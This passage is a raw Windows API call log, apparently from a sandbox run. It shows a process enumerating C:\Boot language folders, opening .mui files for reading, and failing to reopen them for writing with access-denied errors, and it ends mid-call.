[0070.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0070.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 30 [0070.868] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.868] GetFileType (hFile=0x418) returned 0x1 [0070.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.868] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.869] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.869] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.869] CloseHandle (hObject=0x418) returned 1 [0070.869] AreFileApisANSI () returned 1 [0070.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 30 [0070.869] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.869] GetLastError () returned 0x5 [0070.869] GetLastError () returned 0x5 [0070.869] SetLastError (dwErrCode=0x5) [0070.869] GetLastError () returned 0x5 [0070.869] SetLastError (dwErrCode=0x5) [0070.869] GetLastError () returned 0x5 [0070.869] SetLastError (dwErrCode=0x5) [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.870] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69358, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓꾘")) returned 0 [0070.870] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.871] AreFileApisANSI () returned 1 [0070.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\tr-TR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\tr-TR", lpUsedDefaultChar=0x0) returned 14 [0070.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0070.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.871] AreFileApisANSI () returned 1 [0070.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0070.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\tr-TR") returned 14 [0070.871] CreateFileW (lpFileName="C:\\Boot\\tr-TR" (normalized: "c:\\boot\\tr-tr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.871] GetLastError () returned 0x5 [0070.871] GetLastError () returned 0x5 [0070.871] SetLastError (dwErrCode=0x5) [0070.871] GetLastError () returned 0x5 [0070.871] SetLastError (dwErrCode=0x5) [0070.871] GetLastError () returned 0x5 [0070.871] SetLastError (dwErrCode=0x5) [0070.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.871] AreFileApisANSI () returned 1 [0070.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0070.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\tr-TR") returned 14 [0070.872] CreateFileW (lpFileName="C:\\Boot\\tr-TR" (normalized: "c:\\boot\\tr-tr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.872] GetLastError () returned 0x5 [0070.872] GetLastError () returned 0x5 [0070.872] SetLastError (dwErrCode=0x5) [0070.872] GetLastError () returned 0x5 [0070.872] SetLastError (dwErrCode=0x5) [0070.872] GetLastError () returned 0x5 [0070.872] SetLastError (dwErrCode=0x5) [0070.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.872] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0070.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.872] FindFirstFileExW (in: lpFileName="C:\\Boot\\tr-TR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78610 [0070.872] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.872] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.873] AreFileApisANSI () returned 1 [0070.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0070.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.874] AreFileApisANSI () returned 1 [0070.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30 [0070.874] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.875] GetFileType (hFile=0x418) returned 0x1 [0070.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.875] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.876] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.876] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.876] CloseHandle (hObject=0x418) returned 1 [0070.876] AreFileApisANSI () returned 1 [0070.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30 [0070.876] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.877] GetLastError () returned 0x5 [0070.877] GetLastError () returned 0x5 [0070.877] SetLastError (dwErrCode=0x5) [0070.877] GetLastError () returned 0x5 [0070.877] SetLastError (dwErrCode=0x5) [0070.877] GetLastError () returned 0x5 [0070.877] SetLastError (dwErrCode=0x5) [0070.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.877] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0070.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.879] AreFileApisANSI () returned 1 [0070.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\tr-TR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, 